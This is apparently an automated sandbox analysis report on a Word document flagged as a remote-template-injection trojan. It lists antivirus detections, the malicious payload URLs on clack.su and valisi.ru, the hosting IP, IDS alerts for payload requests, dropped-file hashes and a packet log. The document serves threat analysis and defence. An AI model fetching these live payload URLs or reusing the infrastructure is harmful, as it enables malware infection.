  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1668984 Sample: _________19.03.docx Startdate: 19/04/2025 Architecture: WINDOWS Score: 68 12 valisi.ru 2->12 14 clack.su 2->14 18 Suricata IDS alerts for network traffic 2->18 20 Antivirus detection for URL or domain 2->20 22 Multi AV Scanner detection for submitted file 2->22 24 Contains an external reference to another file 2->24 6 WINWORD.EXE 165 96 2->6         started        signatures3 process4 dnsIp5 16 clack.su 91.218.228.26, 49716, 49719, 49724 IHCRUInternet-HostingLtdMoscowRussiaRU Russian Federation 6->16 10 C:\Users\user\...\_________19.03.docx (copy), Microsoft 6->10 dropped file6

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
_________19.03.docx45%VirustotalBrowse
_________19.03.docx42%ReversingLabsDocument-Word.Trojan.RemoteTemplateInj
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://clack.su/fox.docx100%Avira URL Cloudmalware
http://valisi.ru/first.rtf100%Avira URL Cloudmalware

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
valisi.ru
91.218.228.26
truetrue
    unknown
    s-0005.dual-s-msedge.net
    52.123.129.14
    truefalse
      high
      clack.su
      91.218.228.26
      truetrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://clack.su/fox.docxtrue
        • Avira URL Cloud: malware
        unknown
        http://valisi.ru/first.rtftrue
        • Avira URL Cloud: malware
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        91.218.228.26
        valisi.ruRussian Federation
        203226IHCRUInternet-HostingLtdMoscowRussiaRUtrue
        Joe Sandbox version:42.0.0 Malachite
        Analysis ID:1668984
        Start date and time:2025-04-19 02:43:32 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 30s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:24
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:_________19.03.docx
        Detection:MAL
        Classification:mal68.evad.winDOCX@2/5@3/1
        Cookbook Comments:
        • Found application associated with file extension: .docx
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, sppsvc.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 52.109.20.38, 23.202.75.249, 52.109.8.36, 20.42.65.84, 23.1.33.10, 23.1.33.18, 52.111.230.25, 52.111.230.27, 52.111.230.26, 52.111.230.24, 52.123.129.14, 40.126.28.20, 204.79.197.222, 4.245.163.56
        • Excluded domains from analysis (whitelisted): fp.msedge.net, slscr.update.microsoft.com, scus-azsc-config.officeapps.live.com, templatesmetadata.office.net.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, prod-eus-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, osiprod-cus-buff-azsc-000.centralus.cloudapp.azure.com, login.live.com, onedscolprdeus02.eastus.cloudapp.azure.com, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, c.pki.goog, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod-na.naturallanguageeditorservice.osi.office.net.akadns.net, prod.roaming1.live.com.akadns.net, cus-azsc-000.roaming.officeapps.live.com, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadn
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.
        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        No simulations
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        91.218.228.26#U0434#U043e#U0433#U043e#U0432#U043e#U0440.pdf.lnkGet hashmaliciousUnknownBrowse
        • ecols.ru/ecols.hta
        ____ ______.xls.lnk.bin.lnkGet hashmaliciousMetasploitBrowse
        • ecols.ru/ecols.hta
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        s-0005.dual-s-msedge.netYour Shipment Is On Its Way.emlGet hashmaliciousUnknownBrowse
        • 52.123.129.14
        3a8e85ffd4abGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
        • 52.123.129.14
        Message.emlGet hashmaliciousHTMLPhisherBrowse
        • 52.123.128.14
        Message.emlGet hashmaliciousUnknownBrowse
        • 52.123.128.14
        FFL-2025-00947 PAYMENT.docx.docGet hashmaliciousUnknownBrowse
        • 52.123.128.14
        FFL-2025-00947 PAYMENT.docx.docGet hashmaliciousUnknownBrowse
        • 52.123.129.14
        richardsewell-4-15-24.Bayer Heritage FCU BHFCU0425.emlGet hashmaliciousUnknownBrowse
        • 52.123.129.14
        $RCNW0Y4.emlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
        • 52.123.129.14
        Deal Sheet & Commitment-New Deal (1).emlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
        • 52.123.128.14
        phish_alert_sp2_2.0.0.0.msgGet hashmaliciousUnknownBrowse
        • 52.123.128.14
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        IHCRUInternet-HostingLtdMoscowRussiaRU1isequal9.x86_64.elfGet hashmaliciousUnknownBrowse
        • 185.87.196.255
        #U0434#U043e#U0433#U043e#U0432#U043e#U0440.pdf.lnkGet hashmaliciousUnknownBrowse
        • 91.218.228.26
        ____ ______.xls.lnk.bin.lnkGet hashmaliciousMetasploitBrowse
        • 91.218.228.26
        f8PZ0Uuwau.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
        • 217.144.98.170
        grxpiPs2Fw.elfGet hashmaliciousMirai, MoobotBrowse
        • 91.218.228.164
        http://hotel-karmen.ruGet hashmaliciousUnknownBrowse
        • 37.143.13.155
        LockyRansom.exeGet hashmaliciousUnknownBrowse
        • 37.143.9.154
        LockyRansom.exeGet hashmaliciousUnknownBrowse
        • 37.143.9.154
        KtMg6d1Ivx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
        • 185.87.199.107
        https://googleads.g.doubleclick.net/pcs/click?xai=AKAOjsuLaMSxRbnmx4CaSYBD7UEX1peDpNeYnMWW4dVza-G52TGjr2vj5pKsC0MnZ5wKKbv48DTu4_9zifCV__nn-40JMtKyE_J-VMT8wv7a1Lf0nNBgkN5ubnqB_fbDSNDoYvSXrEeZ7mt6jhn1Gl78NJ_xm24v553oIbpIcOlySTxRzwS3ROTWKkuLKGhJpg1kkeB-2p7L0D_C0Tx_5HYnjwuOs8n8jzqBq4O3iSh2WW3Es8m8o5Fm3xTlO9UbT5wj7XWQmwefhVbuqmrnfemDwqzjrWGaSNRRqB_R9QTXSQjdFDdWTx0_Oo7RzbAWcjKqQR2JbLAW_ZYkDd6cz8q8BYpJJzzkZ6QKuyXH_CCgkPoul09CafKLox9uieqQMwQ&sai=AMfl-YQSMSxmTEvfKP4k3QH0IYz2PIsK1wo62PVWE2-bo7ZdB4Yue3XhmrRw5NnkQ1uiDEixQcvMUgBuCbvmwfqOzcwUGUmidc9tgXXMjS8Z7zb-8rHzyMziFnJ7Kv7S6gwBuwmLhiK3qougMvlVE4DWmw&sig=Cg0ArKJSzCxoV_8QjjEU&fbs_aeid=%5Bgw_fbsaeid%5D&adurl=https://dubaieventhost.com?26utm_source%3Dacuityads%26utm_medium%3Ddisplay%26utm_campaign%3D23%26utm_content%3D728x90_CyberWeek%26utm_term%3DNOOFR%26dclid%3D%25edclid!Get hashmaliciousUnknownBrowse
        • 95.183.11.171
        No context
        No context
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:GIF image data, version 89a, 15 x 15
        Category:dropped
        Size (bytes):663
        Entropy (8bit):5.949125862393289
        Encrypted:false
        SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
        MD5:ED3C1C40B68BA4F40DB15529D5443DEC
        SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
        SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
        SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
        Malicious:false
        Reputation:high, very likely benign file
        Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:Microsoft Word 2007+
        Category:dropped
        Size (bytes):56704
        Entropy (8bit):7.763520369568193
        Encrypted:false
        SSDEEP:768:ia9BfkLt5wPhPrxqkpYzhZzfIb72hgKc4/GkFEXRtv/hvTnqRINkagCI2eR+Grl:RB6upRUhE7YS4+Cmrv/hvTghagDR+G5
        MD5:CEE10264E377550CD27C2838667B1165
        SHA1:F25B660A099FE4D7BC77365FC2C6099F7554863E
        SHA-256:91325863AD76519F7A0F26EF86AABE89534B25E162824B97D43230FA1278254C
        SHA-512:553413C906A2DFF5B8CF64816B21C69BEB8B48C834A56432BA48040D801F5095E2F4D5837A4C7450A5C32417997F762C9140232224D2739DC6EB1D7AA670D593
        Malicious:true
        Reputation:low
        Preview:PK..........!...K.....m.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H...W...B.).]8."-H\]{...%{...3I..A!.!..DJf.}..-gf...d.....`...e.W.-.v{s59cYB.0.A.6.....`v...2.v.`+.p.y.+.".>..H..H.q...b..d:...w..'Xi.....bm0.|....}.%.~6..W.......[...75"...@..G..M.T9U.9i.C:.........?...d.".oa).?....rm.2.\f../K-....B..R.}.&o#Vh....!......k.{.}H.qZ.J."jh{...?`8.....pk..H.......H.1.......D*..`.......Q....).G.q..h.;!....v..+......A#.k.F.o.{.......i....'?.00F....H..4..'....2....G.....2U.$
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):4.731640959097586
        Encrypted:false
        SSDEEP:3:KVGl/lilKlRAGlAbF/4cux5mFMNh9VOVBiFHeb9V7HHKmRaa+qY6P:KVy/4KDyJruxmMNrVOjPb9NHHKm8LqXP
        MD5:73410AC45720096DF62C56DF7C8004ED
        SHA1:A1F1267BB5D67F3DC9CB55D40A105A83D17EC16D
        SHA-256:FBC7910A9373E8CD5C6AF5902A502007BC36D09F920CC6D08E6AD8FC04D43A9C
        SHA-512:9B6B397433871D0BD64A8C2220F2499DFFF92A99558AA018A4EA5B855E9E8498DFF06148315F77C6F424BCC8BC59A4AF2CD334A4CDAA39235C6DE959B16DAC13
        Malicious:false
        Reputation:low
        Preview:.user..................................................j.o.n.e.s...{...k..p.p`[..<..%..J.k3....i....l.Y.X.+.....`..k7..~a...........'.$'O.}.aj....0.N..=.j
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:Microsoft Word 2007+
        Category:dropped
        Size (bytes):56704
        Entropy (8bit):7.763520369568193
        Encrypted:false
        SSDEEP:768:ia9BfkLt5wPhPrxqkpYzhZzfIb72hgKc4/GkFEXRtv/hvTnqRINkagCI2eR+Grl:RB6upRUhE7YS4+Cmrv/hvTghagDR+G5
        MD5:CEE10264E377550CD27C2838667B1165
        SHA1:F25B660A099FE4D7BC77365FC2C6099F7554863E
        SHA-256:91325863AD76519F7A0F26EF86AABE89534B25E162824B97D43230FA1278254C
        SHA-512:553413C906A2DFF5B8CF64816B21C69BEB8B48C834A56432BA48040D801F5095E2F4D5837A4C7450A5C32417997F762C9140232224D2739DC6EB1D7AA670D593
        Malicious:false
        Reputation:low
        Preview:PK..........!...K.....m.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H...W...B.).]8."-H\]{...%{...3I..A!.!..DJf.}..-gf...d.....`...e.W.-.v{s59cYB.0.A.6.....`v...2.v.`+.p.y.+.".>..H..H.q...b..d:...w..'Xi.....bm0.|....}.%.~6..W.......[...75"...@..G..M.T9U.9i.C:.........?...d.".oa).?....rm.2.\f../K-....B..R.}.&o#Vh....!......k.{.}H.qZ.J."jh{...?`8.....pk..H.......H.1.......D*..`.......Q....).G.q..h.;!....v..+......A#.k.F.o.{.......i....'?.00F....H..4..'....2....G.....2U.$
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):26
        Entropy (8bit):3.95006375643621
        Encrypted:false
        SSDEEP:3:ggPYV:rPYV
        MD5:187F488E27DB4AF347237FE461A079AD
        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
        Malicious:false
        Reputation:high, very likely benign file
        Preview:[ZoneTransfer]....ZoneId=0
        File type:Microsoft OOXML
        Entropy (8bit):7.928562966578789
        TrID:
        • Word Microsoft Office Open XML Format document (49504/1) 58.23%
        • Word Microsoft Office Open XML Format document (27504/1) 32.35%
        • ZIP compressed archive (8000/1) 9.41%
        File name:_________19.03.docx
        File size:52'301 bytes
        MD5:f9026fabfb8d131863ad06fd72eb2717
        SHA1:ffa14e589d99a95d025b0ae5d7122319195622f7
        SHA256:4640c58e3c658d8178f4e9d9570566040ad162e25b61a46b0be989aeb69db679
        SHA512:496f7ea4bd96533f02623a6a5755eccec6d7e4b16c46924a8d41951ec862e274c4ec7b4aa43f2db8ab08379cb2309287c7455e54fab56175f40d6d0848773a2c
        SSDEEP:1536:NKvY2UlwL6buqh9dLpHmcTyAiC5SzkAXulN:NKgtu4dLwcGAiC53iQN
        TLSH:B433E010CE1C1026C746A7346A4D1D86F70DD16AEAC1B72B6E56DACC4982BC35F27CDA
        File Content Preview:PK..........!.........N......._rels/.rels..QK.0.....C..-..D..{...D...m.....F...VPtp.{l.|......Q.q..x........|...}\...B...<k8q.]s}.}..........g..H.G.f..r."....4..g.1.9P....[L.....jo5......"/a..s...y......Gao..b*.I\.F..z..6....H1V..x.h....iqb!KBhB..>.......
        Icon Hash:35e5c48caa8a8599

        Download Network PCAP: filteredfull

        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
        2025-04-19T02:44:40.837742+02001810005Joe Security ANOMALY Microsoft Office WebDAV Discovery1192.168.2.44971991.218.228.2680TCP
        2025-04-19T02:44:43.229507+02002800029ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass191.218.228.2680192.168.2.449726TCP
        2025-04-19T02:44:45.155817+02001810005Joe Security ANOMALY Microsoft Office WebDAV Discovery1192.168.2.44973191.218.228.2680TCP
        2025-04-19T02:44:46.343974+02002055080ET MALWARE TA399/Sidewinder Activity Payload Request M3, Microsoft Word UA Request for .rtf1192.168.2.44973491.218.228.2680TCP
        2025-04-19T02:44:47.340125+02002033858ET MALWARE TA399/Sidewinder Activity Payload Request M2, Microsoft Office UA Request for .rtf 1192.168.2.44973591.218.228.2680TCP
        • Total Packets: 113
        • 80 (HTTP)
        • 53 (DNS)
        TimestampSource PortDest PortSource IPDest IP
        Apr 19, 2025 02:44:38.633733034 CEST4971680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:39.010466099 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:39.011039019 CEST4971680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:39.011279106 CEST4971680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:39.387878895 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:39.876626968 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:39.876643896 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:39.876655102 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:39.876708031 CEST4971680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:39.876727104 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:39.876739025 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:39.876749992 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:39.876760960 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:39.876773119 CEST4971680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:39.876780033 CEST4971680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:39.913635015 CEST4971680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:39.921441078 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:39.921463966 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:39.921523094 CEST4971680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.075665951 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.244064093 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.244174957 CEST4971680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.253591061 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.253611088 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.253624916 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.253638983 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.253648043 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.253653049 CEST4971680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.253662109 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.253679037 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.253684044 CEST4971680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.253695011 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.253701925 CEST4971680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.253710032 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.253725052 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.253734112 CEST4971680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.253758907 CEST4971680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.253782988 CEST4971680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.264323950 CEST804971691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.264379978 CEST4971680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.308156013 CEST804971991.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.308229923 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.308360100 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.540925980 CEST804971991.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.837677956 CEST804971991.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.837697029 CEST804971991.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.837713003 CEST804971991.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.837728024 CEST804971991.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.837742090 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.837755919 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.837770939 CEST804971991.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.837781906 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.837795019 CEST804971991.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.837810040 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.837820053 CEST804971991.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.837836027 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.837863922 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.851665020 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.851686954 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.871555090 CEST4972480192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.878360987 CEST804971991.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.878379107 CEST804971991.218.228.26192.168.2.4
        Apr 19, 2025 02:44:40.878407001 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:40.878421068 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:41.070095062 CEST804971991.218.228.26192.168.2.4
        Apr 19, 2025 02:44:41.070116043 CEST804971991.218.228.26192.168.2.4
        Apr 19, 2025 02:44:41.070149899 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:41.070162058 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:41.070175886 CEST804971991.218.228.26192.168.2.4
        Apr 19, 2025 02:44:41.070213079 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:41.070233107 CEST804971991.218.228.26192.168.2.4
        Apr 19, 2025 02:44:41.070247889 CEST804971991.218.228.26192.168.2.4
        Apr 19, 2025 02:44:41.070276976 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:41.070343971 CEST4971980192.168.2.491.218.228.26
        Apr 19, 2025 02:44:41.248621941 CEST804972491.218.228.26192.168.2.4
        Apr 19, 2025 02:44:41.248723030 CEST4972480192.168.2.491.218.228.26
        Apr 19, 2025 02:44:41.249003887 CEST4972480192.168.2.491.218.228.26
        Apr 19, 2025 02:44:41.626068115 CEST804972491.218.228.26192.168.2.4
        Apr 19, 2025 02:44:41.626091003 CEST804972491.218.228.26192.168.2.4
        Apr 19, 2025 02:44:41.672148943 CEST4972480192.168.2.491.218.228.26
        Apr 19, 2025 02:44:41.694412947 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:42.066442013 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.066740990 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:42.066957951 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:42.438878059 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.439097881 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.439110994 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.439124107 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.439184904 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:42.439194918 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.439208031 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.439218044 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.439229012 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.439233065 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:42.439239979 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.439245939 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.439256907 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.439265013 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:42.439306021 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:42.439306021 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:42.811322927 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.811341047 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.811352015 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.811378956 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.811388969 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.811399937 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.811410904 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.811423063 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.811434031 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.811444998 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.811455965 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.811472893 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:42.811481953 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:42.811481953 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:42.811518908 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:42.811518908 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:42.857609987 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:43.229506969 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:43.229576111 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:43.389374018 CEST4973080192.168.2.491.218.228.26
        Apr 19, 2025 02:44:43.620464087 CEST804973091.218.228.26192.168.2.4
        Apr 19, 2025 02:44:43.620543003 CEST4973080192.168.2.491.218.228.26
        Apr 19, 2025 02:44:43.620726109 CEST4973080192.168.2.491.218.228.26
        Apr 19, 2025 02:44:43.851835012 CEST804973091.218.228.26192.168.2.4
        Apr 19, 2025 02:44:44.100126982 CEST804973091.218.228.26192.168.2.4
        Apr 19, 2025 02:44:44.100192070 CEST804973091.218.228.26192.168.2.4
        Apr 19, 2025 02:44:44.100238085 CEST4973080192.168.2.491.218.228.26
        Apr 19, 2025 02:44:44.100279093 CEST804973091.218.228.26192.168.2.4
        Apr 19, 2025 02:44:44.100291967 CEST804973091.218.228.26192.168.2.4
        Apr 19, 2025 02:44:44.100311995 CEST804973091.218.228.26192.168.2.4
        Apr 19, 2025 02:44:44.100327015 CEST804973091.218.228.26192.168.2.4
        Apr 19, 2025 02:44:44.100349903 CEST4973080192.168.2.491.218.228.26
        Apr 19, 2025 02:44:44.100351095 CEST804973091.218.228.26192.168.2.4
        Apr 19, 2025 02:44:44.100379944 CEST4973080192.168.2.491.218.228.26
        Apr 19, 2025 02:44:44.101605892 CEST4973080192.168.2.491.218.228.26
        Apr 19, 2025 02:44:44.105494976 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:44.199604988 CEST804973091.218.228.26192.168.2.4
        Apr 19, 2025 02:44:44.199678898 CEST4973080192.168.2.491.218.228.26
        Apr 19, 2025 02:44:44.199687004 CEST804973091.218.228.26192.168.2.4
        Apr 19, 2025 02:44:44.199738026 CEST4973080192.168.2.491.218.228.26
        Apr 19, 2025 02:44:44.225159883 CEST804973091.218.228.26192.168.2.4
        Apr 19, 2025 02:44:44.225209951 CEST4973080192.168.2.491.218.228.26
        Apr 19, 2025 02:44:44.331327915 CEST804973091.218.228.26192.168.2.4
        Apr 19, 2025 02:44:44.331373930 CEST804973091.218.228.26192.168.2.4
        Apr 19, 2025 02:44:44.331374884 CEST4973080192.168.2.491.218.228.26
        Apr 19, 2025 02:44:44.331407070 CEST804973091.218.228.26192.168.2.4
        Apr 19, 2025 02:44:44.331413984 CEST4973080192.168.2.491.218.228.26
        Apr 19, 2025 02:44:44.331423044 CEST804973091.218.228.26192.168.2.4
        Apr 19, 2025 02:44:44.331445932 CEST4973080192.168.2.491.218.228.26
        Apr 19, 2025 02:44:44.331461906 CEST4973080192.168.2.491.218.228.26
        Apr 19, 2025 02:44:44.488872051 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:44.488961935 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:44.489150047 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:44.872569084 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.155724049 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.155778885 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.155817032 CEST4973180192.168.2.491.218.228.26
